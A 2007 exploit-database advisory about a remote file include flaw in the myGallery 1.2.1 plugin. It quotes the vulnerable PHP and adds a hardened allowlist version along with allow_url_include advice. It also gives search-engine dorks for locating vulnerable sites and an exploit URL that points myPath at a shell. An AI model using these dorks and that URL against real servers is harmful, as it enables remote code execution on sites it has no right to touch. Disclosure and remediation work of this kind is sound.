SECURITYVULNS:DOC:16887
Apr 30, 2007

myGallery 1.2.1 (myPath) Remote File Include Vulnerability



Script Page: http://www.wildbits.de/usr_files/mygallery_1.2.1.zip

Discovered by: GolD_M = [Mahmood_ali]

Homepage: http://www.Tryag.cc

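Vulnerable code:

#########################################################
// [+] marks the lines where request input reaches the include.
if (!$_POST){
    $mypath=$_GET['myPath'];   // <---------[+] taken from the query string
}
else {
    $mypath=$_POST['myPath'];  // <---------[+] or from the POST body
}
require_once($mypath.'/wp-config.php');  // <---------[+] request-controlled include path
########################################################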
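
A hardened form of the include above, added here as an example (it is not myGallery's code and not part of the advisory): myPath is canonicalised and accepted only when it matches a server-side allowlist, instead of being concatenated into require_once. The function name resolve_wp_root, the temporary demo directory and the dirname(__DIR__, 4) plugin layout are assumptions.

```php
<?php
declare(strict_types=1);
// Added example, not myGallery code. resolve_wp_root() and the demo paths
// are hypothetical names chosen for illustration.

function resolve_wp_root($requested, array $allowedRoots): string
{
    // Canonicalise the allowlist; realpath() returns false for missing paths.
    $allowed = array_values(array_filter(array_map('realpath', $allowedRoots)));
    if ($allowed === []) {
        throw new RuntimeException('no WordPress root configured');
    }
    if ($requested === null || $requested === '') {
        return $allowed[0];            // parameter absent: use the trusted default
    }
    if (!is_string($requested)) {      // myPath[]=x arrives as an array
        throw new InvalidArgumentException('myPath must be a string');
    }
    // realpath() resolves local paths only, so URL-style values yield false,
    // and "../" sequences are collapsed before the allowlist comparison.
    $real = realpath($requested);
    if ($real === false || !in_array($real, $allowed, true)) {
        throw new InvalidArgumentException('myPath is not an allowed directory');
    }
    return $real;
}

// Constructed demo: a temporary directory stands in for the WordPress root.
// In the plugin the allowlist would be fixed in code, e.g. [dirname(__DIR__, 4)]
// (assumption: the script sits in wp-content/plugins/mygallery/myfunctions).
$root = sys_get_temp_dir() . '/mygallery_demo_' . getmypid();
mkdir($root . '/sub', 0700, true);
file_put_contents($root . '/wp-config.php', "<?php // stub\n");

// Constructed sample values for the myPath parameter.
$samples = [null, $root, $root . '/sub/..', $root . '/sub',
            'http://remote.example/dir', ['x']];
foreach ($samples as $value) {
    $shown = json_encode($value, JSON_UNESCAPED_SLASHES);
    try {
        $dir = resolve_wp_root($value, [$root]);
        require_once $dir . '/wp-config.php';  // path prefix is now server-chosen
        echo $shown, " => accepted\n";
    } catch (InvalidArgumentException $e) {
        echo $shown, ' => rejected: ', $e->getMessage(), "\n";
    }
}
unlink($root . '/wp-config.php');
rmdir($root . '/sub');
rmdir($root);
```

Keeping allow_url_include set to Off in php.ini stops PHP from fetching an include target over HTTP even where a check like this is missing.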

Dork :

inurl:/mygallery/myfunctions/ (OR) Index of /mygallery/myfunctions (OR) inurl:mygallerytmpl.php

Ex:

[Path_myGallery]/mygallery/myfunctions/mygallerybrowser.php?myPath=Shell

Sp.Thanx = Tryag-Team

milw0rm.com [2007-04-29]